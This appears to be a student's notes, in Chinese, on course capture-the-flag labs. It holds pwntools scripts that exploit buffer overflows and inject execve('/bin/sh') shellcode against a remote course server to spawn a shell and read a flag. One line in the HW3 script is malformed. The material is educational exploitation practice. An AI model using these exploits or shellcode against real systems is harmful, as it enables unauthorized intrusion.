Week11 & 12 11/26 & 12/3

> # Week11 & 12 11/26 & 12/3 ## `Lab 1` ### Buffer Overflow ![](https://i.imgur.com/c5ijF8t.png) > * ![](https://i.imgur.com/0qErq9C.png) > * 一開始檢查是什麼檔案，是64bits > * 看到城市寫bof，應該是buffer overflow 問題 > * 因為bof後會影響instruction pointer位置，導致error > * 就嘗試了重複輸入'A'測試到什麼程度程式input會overflow > * ![](https://i.imgur.com/818lJ38.png) > * ![](https://i.imgur.com/w2HS4st.png) > * 找到24，也加了BBB證實ip有424242 bof > * 現在要位移24個位子，把instruction point到我們要的address > * 要找的是shell address，適用Python後即進入shell，然後看到有個flag檔，cat flag即拿到flag > * ![](https://i.imgur.com/DTZGrch.png) > * ![](https://i.imgur.com/o3FQNU9.png) > * ![](https://i.imgur.com/HezXRdi.png) > * `from pwn import * #r=process('./lab1') r = remote('140.134.25.138',20001) r.recvline() input() #r.recvuntil('Your first challenge for bof') r.send(b'a' * 24 + p64(0x400638)) r.send("cat flag") #print (p64(0x400638)) r.interactive() ` > * 參考影片https://www.youtube.com/watch?v=YVlTDPhTA9U&ab_channel=JohnHammond ## `Lab 2` ### Shellcode ![](https://i.imgur.com/cEmFklP.png) > from pwn import * > #r=process('./lab2') > r=remote('140.134.25.138',20002) > context.arch='amd64' > #code=shellcraft.sh() > #asm_code=asm(code) > code=''' > mov rbx, 0x68732f6e69622f > push rbx > mov rdi, rsp > mov rsi, 0x0 > mov rdx, 0x0 > mov rax, 0x3b > syscall > ''' > print(code) > asm_code=asm(code) > print(len(asm_code)) > r.send(asm_code) > r.sendline(b'a'*24+p64(0x601060)) > r.interactive() > * ![](https://i.imgur.com/6djen0m.png) ## `HW1` ### ![](https://i.imgur.com/D3r1iUe.png) > from pwn import * > > r=remote('140.134.25.138',25000) > #r.recvline() > r.send(b'a'*40 + p64(0x400778)) > r.send(b'a'*28 + p64(0)) > r.interactive() > ![](https://i.imgur.com/Bc4foVr.png) ## `HW2` ### > ![](https://i.imgur.com/HktDrMY.png) ## `HW3` ### from pwn import * #r = process('./hw3') r = remote('140.134.25.138',25002) input() context.arch = 'amd64' code = shellcraft.sh() asm_code = asm(code) r.send(b'a' * 28 + 232(0x40) + b'a' * 8 + p64(0x6010a0)) r.send(asm_code) r.interactive()